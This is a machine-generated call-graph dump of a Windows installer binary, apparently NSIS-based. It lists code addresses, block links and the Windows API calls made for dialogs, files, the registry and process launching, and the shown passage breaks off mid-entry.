3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 